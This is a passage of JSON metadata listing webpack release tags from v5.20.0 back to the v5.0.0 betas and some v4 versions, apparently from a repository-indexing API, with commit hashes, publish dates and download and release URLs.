_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","p